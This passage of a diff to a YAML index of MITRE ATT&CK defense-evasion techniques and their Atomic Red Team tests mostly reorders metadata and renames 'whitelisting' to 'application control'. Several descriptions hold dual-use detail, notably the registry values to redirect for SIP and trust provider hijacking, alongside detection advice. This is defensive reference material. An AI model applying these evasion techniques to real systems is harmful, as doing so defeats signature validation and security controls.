Monitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Alain Homewood, Insomnia Security
- - Vincent Le Toux
+ x_mitre_data_sources:
+ - Windows event logs
+ - Authentication logs
+ - API monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1553.003:
technique:
@@ -30347,11 +31292,11 @@ defense-evasion:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: SIP and Trust Provider Hijacking
description: |-
- Adversaries may tamper with SIP and trust provider components to mislead the operating system and application whitelisting tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
+ Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
- Similar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
+ Similar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
@@ -30364,21 +31309,18 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T13:19:38.506Z'
+ modified: '2020-06-20T22:42:26.022Z'
created: '2020-02-05T19:34:04.910Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Matt Graeber, @mattifestation, SpecterOps
- x_mitre_data_sources:
- - Windows Registry
- - API monitoring
- - Application logs
- - DLL monitoring
- - Loaded DLLs
- - Process monitoring
- - Windows Registry
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ - Administrator
+ x_mitre_defense_bypassed:
+ - Application control
+ - Autoruns Analysis
+ - Digital Certificate Validation
+ - User Mode Signature Validation
x_mitre_detection: |-
Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)
@@ -30394,17 +31336,19 @@ defense-evasion:
**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1117). (Citation: SpectorOps Subverting Trust Sept 2017)
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)
- x_mitre_defense_bypassed:
- - Application whitelisting
- - Autoruns Analysis
- - Digital Certificate Validation
- - Process whitelisting
- - User Mode Signature Validation
- x_mitre_permissions_required:
- - SYSTEM
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - API monitoring
+ - Application logs
+ - DLL monitoring
+ - Loaded DLLs
+ - Process monitoring
+ - Windows Registry
+ - Windows event logs
+ x_mitre_contributors:
+ - Matt Graeber, @mattifestation, SpecterOps
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1064:
technique:
@@ -30451,29 +31395,29 @@ defense-evasion:
phase_name: execution
modified: '2020-03-30T13:39:24.852Z'
created: '2017-05-31T21:30:51.733Z'
- x_mitre_deprecated: true
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- - Process command-line parameters
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Data Execution Prevention
- - Exploit Prevention
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Scripting may be common on admin, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
Analyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_defense_bypassed:
+ - Process whitelisting
+ - Data Execution Prevention
+ - Exploit Prevention
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_deprecated: true
atomic_tests: []
T1574.010:
technique:
@@ -30503,8 +31447,22 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-26T19:37:28.912Z'
created: '2020-03-12T20:43:53.998Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Stefan Kanthak
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Services
+ - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: "Look for changes to binaries and service executables that
may normally occur during software updates. If an executable is written, renamed,
and/or moved to match an existing service executable, it could be detected
@@ -30513,22 +31471,8 @@ defense-evasion:
for abnormal process call trees from typical processes and services and for
execution of other commands that could relate to Discovery or other adversary
techniques. "
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process command-line parameters
- - Services
- - File monitoring
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
identifier: T1574.010
atomic_tests:
- name: File System Permissions Weakness
@@ -30633,32 +31577,32 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:43:33.981Z'
+ modified: '2020-06-20T22:01:09.906Z'
created: '2020-03-13T11:42:14.444Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Matthew Demaske, Adaptforward
- x_mitre_data_sources:
- - Windows Registry
- - Services
- - Process command-line parameters
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Process whitelisting
+ x_mitre_data_sources:
+ - Windows Registry
+ - Services
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Matthew Demaske, Adaptforward
+ x_mitre_platforms:
+ - Windows
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
@@ -30711,20 +31655,20 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-27T00:43:58.149Z'
created: '2020-01-30T14:11:41.212Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor the file system for files that have the setuid or
+ setgid bits set. Monitor for execution of utilities, like chmod, and their
+ command-line arguments to look for setuid or setguid bits being set.
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_detection: Monitor the file system for files that have the setuid or
- setgid bits set. Monitor for execution of utilities, like chmod, and their
- command-line arguments to look for setuid or setguid bits being set.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1548.001
atomic_tests:
- name: Make and modify binary from C source
@@ -30820,9 +31764,26 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T17:19:19.724Z'
+ modified: '2020-06-20T22:39:02.045Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '2.1'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
+
+ Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ - Digital Certificate Validation
+ x_mitre_contributors:
+ - Nishan Maharjan, @loki248
+ - Hans Christoffer Gaardløs
+ - Praetorian
x_mitre_data_sources:
- API monitoring
- File monitoring
@@ -30833,25 +31794,7 @@ defense-evasion:
- DLL monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_contributors:
- - Nishan Maharjan, @loki248
- - Hans Christoffer Gaardløs
- - Praetorian
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
- - Application whitelisting
- - Digital Certificate Validation
- x_mitre_detection: |-
- Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
-
- Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_version: '2.1'
identifier: T1218
atomic_tests:
- name: mavinject - Inject DLL into running process
@@ -30961,7 +31904,7 @@ defense-evasion:
proxy execution of malicious files. Several Microsoft signed scripts that
are default on Windows installations can be used to proxy execution of other
files. This behavior may be abused by adversaries to execute malicious files
- that could bypass application whitelisting and signature validation on systems.(Citation:
+ that could bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
external_references:
- source_name: mitre-attack
@@ -30977,25 +31920,25 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T19:39:37.336Z'
+ modified: '2020-06-20T22:39:47.559Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_contributors:
- - Praetorian
- x_mitre_defense_bypassed:
- - Application whitelisting
- - Digital Certificate Validation
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
parameters for scripts like PubPrn.vbs that may be used to proxy execution
of malicious files.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Application control
+ - Digital Certificate Validation
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.1'
identifier: T1216
atomic_tests:
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
@@ -31038,23 +31981,6 @@ defense-evasion:
name: command_prompt
T1027.002:
technique:
- id: attack-pattern--deb98323-e13f-4b0c-8d94-175379069062
- description: "Adversaries may perform software packing or virtual machine software
- protection to conceal their code. Software packing is a method of compressing
- or encrypting an executable. Packing an executable changes the file signature
- in an attempt to avoid signature-based detection. Most decompression techniques
- decompress the executable code in memory. Virtual machine software protection
- translates an executable's original code into a special format that only a
- special virtual machine can run. A virtual machine is then called to run this
- code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software
- packing are called packers. Example packers are MPRESS and UPX. A more comprehensive
- list of known packers is available, (Citation: Wikipedia Exe Compression)
- but adversaries may create their own packing techniques that do not leave
- the same artifacts as well-known packers to evade defenses. "
- name: Software Packing
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1027.002
@@ -31069,6 +31995,23 @@ defense-evasion:
- url: http://en.wikipedia.org/wiki/Executable_compression
description: Executable compression. (n.d.). Retrieved December 4, 2014.
source_name: Wikipedia Exe Compression
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Software Packing
+ description: "Adversaries may perform software packing or virtual machine software
+ protection to conceal their code. Software packing is a method of compressing
+ or encrypting an executable. Packing an executable changes the file signature
+ in an attempt to avoid signature-based detection. Most decompression techniques
+ decompress the executable code in memory. Virtual machine software protection
+ translates an executable's original code into a special format that only a
+ special virtual machine can run. A virtual machine is then called to run this
+ code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software
+ packing are called packers. Example packers are MPRESS and UPX. A more comprehensive
+ list of known packers is available, (Citation: Wikipedia Exe Compression)
+ but adversaries may create their own packing techniques that do not leave
+ the same artifacts as well-known packers to evade defenses. "
+ id: attack-pattern--deb98323-e13f-4b0c-8d94-175379069062
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -31208,23 +32151,23 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T20:26:01.690Z'
created: '2020-02-10T20:47:10.082Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_contributors:
+ - Erye Hernandez, Palo Alto Networks
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
x_mitre_detection: It's not common for spaces to be at the end of filenames,
so this is something that can easily be checked with file monitoring. From
the user's perspective though, this is very hard to notice from within the
Finder.app or on the command-line in Terminal.app. Processes executed from
binaries containing non-standard extensions in the filename are suspicious.
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_contributors:
- - Erye Hernandez, Palo Alto Networks
- x_mitre_platforms:
- - Linux
- - macOS
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1036.006
atomic_tests:
- name: Space After Filename
@@ -31259,14 +32202,13 @@ defense-evasion:
description: "Adversaries may use steganography techniques in order to prevent
the detection of hidden information. Steganographic techniques can be used
to hide data in digital media such as images, audio tracks, video clips, or
- text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was one of
- the first known and reported adversaries that used steganography with Invoke-PSImage.
- It encrypted the gathered information from a victim's system and hid it within
- an image before exfiltrating the image to a C2 server.(Citation: Wikipedia
- Duqu) \n\nBy the end of 2017, a threat group used Invoke-PSImage to
- hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands
- in an image file (.png) and execute the code on a victim's system. In this
- particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001)
+ text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early
+ example of malware that used steganography. It encrypted the gathered information
+ from a victim's system and hid it within an image before exfiltrating the
+ image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a
+ threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001)
+ commands in an image file (.png) and execute the code on a victim's system.
+ In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001)
code downloaded another obfuscated script to gather intelligence from the
victim's machine and communicate it back to the adversary.(Citation: McAfee
Malicious Doc Targets Pyeongchang Olympics) "
@@ -31275,20 +32217,20 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T20:56:07.825Z'
+ modified: '2020-06-08T18:16:48.253Z'
created: '2020-02-05T14:28:16.719Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Binary file metadata
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Detection of steganography is difficult unless artifacts
are left behind by the obfuscation process that are detectable with a known
signature. Look for strings are other signatures left in system artifacts
related to decoding steganography.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Binary file metadata
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1553:
technique:
@@ -31338,18 +32280,23 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-31T12:49:36.781Z'
+ modified: '2020-06-20T22:42:26.314Z'
created: '2020-02-05T14:54:07.588Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- x_mitre_defense_bypassed:
- - Application whitelisting
- - Anti-virus
- - Autoruns Analysis
- - Digital Certificate Validation
- - Process whitelisting
- - User Mode Signature Validation
- - Windows User Account Control
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_data_sources:
+ - Binary file metadata
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - API monitoring
+ - Application logs
+ - DLL monitoring
+ - Loaded DLLs
+ - Windows Registry
+ - Windows event logs
x_mitre_detection: "Collect and analyze signing certificate metadata on software
that executes within the environment to look for unusual certificate characteristics
and outliers. Periodically baseline registered SIPs and trust providers (Registry
@@ -31367,21 +32314,16 @@ defense-evasion:
high false positive alerts, so compare against baseline knowledge for how
systems are typically used and correlate modification events with other indications
of malicious activity where possible. "
- x_mitre_data_sources:
- - Binary file metadata
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - API monitoring
- - Application logs
- - DLL monitoring
- - Loaded DLLs
- - Windows Registry
- - Windows event logs
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ - Autoruns Analysis
+ - Digital Certificate Validation
+ - Process whitelisting
+ - User Mode Signature Validation
+ - Windows User Account Control
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
atomic_tests: []
T1548.003:
technique:
@@ -31423,23 +32365,23 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-27T01:03:26.306Z'
created: '2020-01-30T14:34:44.992Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - root
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: On Linux, auditd can alert every time a user's actual ID
and effective ID are different (this is what happens when you sudo). This
technique is abusing normal functionality in macOS and Linux systems, but
sudo has the ability to log all input and output based on the LOG_INPUT
and LOG_OUTPUT directives in the /etc/sudoers file.
- x_mitre_permissions_required:
- - User
- x_mitre_effective_permissions:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1548.003
atomic_tests:
- name: Sudo usage
@@ -31487,23 +32429,7 @@ defense-evasion:
sudo visudo -c -f /etc/sudoers
T1497.001:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1497.001
- url: https://attack.mitre.org/techniques/T1497/001
- - source_name: McAfee Virtual Jan 2017
- url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- description: Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual
- Machine. Retrieved April 17, 2019.
- - url: https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/
- description: Falcone, R., et al. (2018, September 04). OilRig Targets a Middle
- Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September
- 24, 2018.
- source_name: Unit 42 OilRig Sept 2018
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: System Checks
+ id: attack-pattern--29be378d-262d-4e99-b00d-852d573628e6
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
based on the results of checks for the presence of artifacts indicative of
@@ -31533,12 +32459,30 @@ defense-evasion:
temperature, and audio devices, could also be used to gather evidence that
can be indicative a virtual environment. Adversaries may also query for specific
readings from these devices.(Citation: Unit 42 OilRig Sept 2018)"
- id: attack-pattern--29be378d-262d-4e99-b00d-852d573628e6
+ name: System Checks
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497.001
+ url: https://attack.mitre.org/techniques/T1497/001
+ - source_name: McAfee Virtual Jan 2017
+ url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
+ description: Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual
+ Machine. Retrieved April 17, 2019.
+ - url: https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/
+ description: Falcone, R., et al. (2018, September 04). OilRig Targets a Middle
+ Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September
+ 24, 2018.
+ source_name: Unit 42 OilRig Sept 2018
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T14:20:15.370Z'
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.514Z'
created: '2020-03-06T20:57:37.959Z'
x_mitre_platforms:
- Linux
@@ -31621,30 +32565,31 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-23T23:50:48.027Z'
+ modified: '2020-05-19T21:22:37.865Z'
created: '2019-12-19T19:43:34.507Z'
- x_mitre_defense_bypassed:
- - Host intrusion prevention systems
- - Anti-virus
- - File monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_detection: |-
- System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
-
- Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Jean-Ian Boutin, ESET
+ - McAfee
+ - Ryan Becwar
x_mitre_data_sources:
- EFI
- BIOS
- API monitoring
- x_mitre_contributors:
- - McAfee
- - Ryan Becwar
- x_mitre_platforms:
- - Windows
+ x_mitre_detection: |-
+ System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
+
+ Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Host intrusion prevention systems
+ - Anti-virus
+ - File monitoring
atomic_tests: []
T1221:
technique:
@@ -31699,27 +32644,28 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T23:32:53.432Z'
+ modified: '2020-04-29T14:37:59.462Z'
created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- x_mitre_contributors:
- - Patrick Campbell, @pjcampbe11
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: 'Analyze process behavior to determine if an Office application
+ is performing actions, such as opening network connections, reading files,
+ spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)),
+ or other suspicious actions that could relate to post-compromise behavior.'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
x_mitre_data_sources:
- Anti-virus
- Email gateway
- Network intrusion detection system
- Web logs
- x_mitre_defense_bypassed:
- - Static File Analysis
- x_mitre_detection: 'Analyze process behavior to determine if an Office application
- is performing actions, such as opening network connections, reading files,
- spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)),
- or other suspicious actions that could relate to post-compromise behavior.'
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
